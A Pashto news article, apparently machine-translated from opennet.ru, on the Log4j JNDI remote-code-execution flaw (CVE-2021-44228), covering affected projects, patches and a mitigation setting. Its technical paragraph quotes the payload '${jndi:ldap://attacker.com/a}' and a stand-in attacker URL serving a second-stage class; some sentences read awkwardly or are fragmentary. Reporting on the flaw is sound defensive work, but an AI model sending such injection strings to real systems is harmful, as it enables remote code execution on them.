په اپاچی Log4j کې ناورین زیانمنتیا د جاوا ډیری پروژې اغیزه کوي

په Apache Log4j کې، د جاوا اپلیکیشنونو کې د ننوتلو تنظیم کولو لپاره یو مشهور چوکاټ، یو مهم زیان په ګوته شوی چې د خپل سري کوډ اجرا کولو ته اجازه ورکوي کله چې د "{jndi:URL}" بڼه کې یو ځانګړی بڼه شوی ارزښت لاګ ته لیکل کیږي. برید د جاوا غوښتنلیکونو باندې ترسره کیدی شي چې د بهرني سرچینو څخه ترلاسه شوي ارزښتونه ننوځي ، د مثال په توګه ، کله چې د خطا پیغامونو کې ستونزې لرونکي ارزښتونه ښیې.

د یادونې وړ ده چې نږدې ټولې پروژې چې چوکاټونه کاروي لکه اپاچي سټرټس ، اپاچي سولر ، اپاچي ډریډ یا اپاچي فلینک د ستونزې لخوا اغیزمن شوي ، پشمول د Steam ، Apple iCloud ، Minecraft پیرودونکي او سرورونه. تمه کیږي چې زیان منونکي د کارپوریټ غوښتنلیکونو باندې د لوی بریدونو څپې لامل شي ، د اپاچي سټراټس چوکاټ کې د جدي زیانونو تاریخ تکراروي ، کوم چې د یوې اندازې اټکل له مخې د فارچون 65٪ لخوا په ویب غوښتنلیکونو کې کارول کیږي. د زیان منونکو سیسټمونو لپاره د شبکې سکین کولو هڅو په شمول 100 شرکتونه.

ستونزه د دې حقیقت له امله نوره هم پیچلې شوې چې د کار ګټه اخیستنه لا دمخه خپره شوې، مګر د باثباته څانګو لپاره اصلاحات لا نه دي ترتیب شوي. د CVE پیژندونکی تر اوسه نه دی ټاکل شوی. فکس یوازې د log4j-2.15.0-rc1 ازموینې څانګې کې شامل دی. د زیان مننې د مخنیوي لپاره د حل په توګه، دا سپارښتنه کیږي چې د log4j2.formatMsgNoLookups پیرامیټر ریښتیا ته وټاکئ.

ستونزه د دې حقیقت له امله رامینځته شوې چې log4j لاګ ته د لاین محصول کې د ځانګړي ماسک "{}" پروسس کولو ملاتړ کوي ، په کوم کې چې د JNDI (جاوا نومونې او لارښود انٹرفیس) پوښتنې اجرا کیدی شي. برید د "${jndi:ldap://attacker.com/a}" بدیل سره د تار تیرولو ته راښکته کیږي، د پروسس کولو پر مهال چې log4j به د جاوا کلاس ته د لارې لپاره د LDAP غوښتنه د attacker.com سرور ته واستوي. . د برید کونکي سرور لخوا راستون شوی لاره (د مثال په توګه http://second-stage.attacker.com/Exploit.class) به د اوسني پروسې په شرایطو کې بار او اجرا شي، کوم چې برید کونکي ته اجازه ورکوي چې په خپل سري کوډ اجرا کړي. د اوسني غوښتنلیک د حقونو سره سیسټم.

ضمیمه 1: زیانمنونکي پیژندونکي CVE-2021-44228 ټاکل شوي.

ضمیمه 2: د خوشې کولو log4j-2.15.0-rc1 لخوا اضافه شوي محافظت څخه د بای پاس کولو یوه لاره په ګوته شوې. یو نوی اوسمهال، log4j-2.15.0-rc2، د زیان مننې په وړاندې د بشپړ محافظت سره وړاندیز شوی. کوډ د غلط شکل شوي JNDI URL کارولو په صورت کې د غیر معمولي پای ته رسیدو نشتوالي سره تړلی بدلون روښانه کوي.

سرچینه: opennet.ru

Add a comment